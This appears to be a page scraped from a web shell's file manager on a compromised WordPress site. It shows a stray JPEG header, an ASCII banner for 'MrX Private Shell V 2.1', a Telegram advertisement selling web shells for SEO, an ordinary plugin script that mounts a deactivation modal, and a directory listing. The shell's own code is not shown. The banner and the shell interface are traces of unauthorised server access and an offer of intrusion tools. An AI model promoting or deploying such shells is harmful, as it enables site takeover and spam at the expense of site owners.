����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import {
render, createRoot
} from '@wordpress/element';
import DeactivationModal from "./components/DeactivationModal/DeactivationModal";
const initModal = () => {
const container = document.getElementById( 'rsssl-modal-root' );
if ( container ) {
if ( createRoot ) {
createRoot( container ).render( <DeactivationModal/> );
} else {
render( <DeactivationModal/>, container );
}
}
};
// Handle both cases - DOM already loaded OR still loading
if ( document.readyState === 'loading' ) {
// DOM hasn't loaded yet
document.addEventListener( 'DOMContentLoaded', initModal );
} else {
// DOM is already ready
initModal();
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| components | Folder | 0755 |
|
|
| index.js | File | 700 B | 0644 |
|